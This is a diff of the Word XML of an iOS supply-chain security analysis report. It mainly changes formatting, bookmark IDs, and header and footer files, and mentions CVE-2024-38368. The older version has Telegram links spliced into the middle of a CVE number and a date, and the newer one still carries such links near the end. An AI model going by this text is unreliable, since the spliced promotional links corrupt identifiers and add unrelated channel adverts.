+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>7</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14070,9 +13762,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14118,9 +13807,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14152,9 +13838,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14174,9 +13857,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14193,11 +13873,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -14232,20 +13907,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>https://t.me/pjx7120</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:bookmarkStart w:id="26" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="26"/>
-    </w:p>
+        <w:t>https://t.me/pjx712</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId7"/>
-      <w:headerReference w:type="default" r:id="rId8"/>
-      <w:footerReference w:type="even" r:id="rId9"/>
-      <w:footerReference w:type="default" r:id="rId10"/>
-      <w:headerReference w:type="first" r:id="rId11"/>
-      <w:footerReference w:type="first" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId7"/>
+      <w:footerReference w:type="default" r:id="rId8"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1360" w:bottom="1440" w:left="1360" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -14281,16 +13955,6 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="aa"/>
-    </w:pPr>
-  </w:p>
-</w:ftr>
-</file>
-
-<file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
 <w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:p>
     <w:pPr>
@@ -14343,7 +14007,7 @@
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:t>16</w:t>
+      <w:t>3</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -14373,16 +14037,6 @@
 </w:ftr>
 </file>
 
-<file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="aa"/>
-    </w:pPr>
-  </w:p>
-</w:ftr>
-</file>
-
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
 <w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:footnote w:type="separator" w:id="-1">
@@ -14409,16 +14063,6 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="a8"/>
-    </w:pPr>
-  </w:p>
-</w:hdr>
-</file>
-
-<file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
 <w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:p>
     <w:pPr>
@@ -14449,16 +14093,6 @@
       </w:rPr>
       <w:t>供应链安全分析报告</w:t>
     </w:r>
-  </w:p>
-</w:hdr>
-</file>
-
-<file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="a8"/>
-    </w:pPr>
   </w:p>
 </w:hdr>
 </file>

--- a/iOS供应链安全分析报告.docx
+++ b/iOS供应链安全分析报告.docx
@@ -6,6 +6,7 @@
       <w:pPr>
         <w:pStyle w:val="a4"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="40"/>
         </w:rPr>
       </w:pPr>
@@ -27,6 +28,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a5"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -83,6 +87,12 @@
         <w:gridCol w:w="5600"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:trPr>
           <w:jc w:val="center"/>
         </w:trPr>
@@ -109,70 +119,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>t.me/one</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>t.me/one00190t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>19</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>26-1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>7</w:t>
+              <w:t>2026-10-07</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -230,13 +177,12 @@
       <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="1F3864"/>
           <w:sz w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -245,7 +191,7 @@
           <w:sz w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>宋体</w:t>
+        <w:t>目录</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -301,7 +247,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275482 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453618 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -362,7 +308,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275483 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453619 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -441,7 +387,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275484 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453620 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -508,7 +454,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275485 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453621 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -575,7 +521,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275486 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453622 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -636,7 +582,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275487 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453623 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -691,19 +637,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>CVE-2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>24-38368</w:t>
+        <w:t>CVE-2024-38368</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -727,7 +661,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275488 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453624 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -794,7 +728,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275489 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453625 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -873,7 +807,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275490 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453626 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -940,7 +874,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275491 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453627 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1001,7 +935,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275492 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453628 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1068,7 +1002,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275493 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453629 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1135,7 +1069,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275494 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453630 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1202,7 +1136,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275495 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453631 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1219,13 +1153,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
+        <w:t>10</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1287,7 +1215,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275496 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453632 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1348,7 +1276,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275497 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453633 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1415,7 +1343,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275498 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453634 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1482,7 +1410,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275499 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453635 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1549,7 +1477,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275500 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453636 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1610,7 +1538,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275501 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453637 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1677,7 +1605,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275502 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453638 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1744,7 +1672,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275503 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453639 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1811,7 +1739,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275504 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453640 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1884,7 +1812,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275505 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453641 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1957,7 +1885,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275506 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453642 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2030,7 +1958,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc242275507 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc242453643 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2059,21 +1987,29 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
-      <w:bookmarkStart w:id="1" w:name="_Toc242275482"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc242453618"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>一、概述</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
-    </w:p>
-    <w:p>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2122,6 +2058,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2165,6 +2104,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2232,6 +2174,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2275,6 +2220,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2315,6 +2263,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2373,6 +2326,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2384,6 +2342,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2402,6 +2363,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2419,19 +2383,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>CVE-2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">24-38368 </w:t>
+        <w:t xml:space="preserve">CVE-2024-38368 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2444,6 +2396,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2468,6 +2423,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2486,6 +2444,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
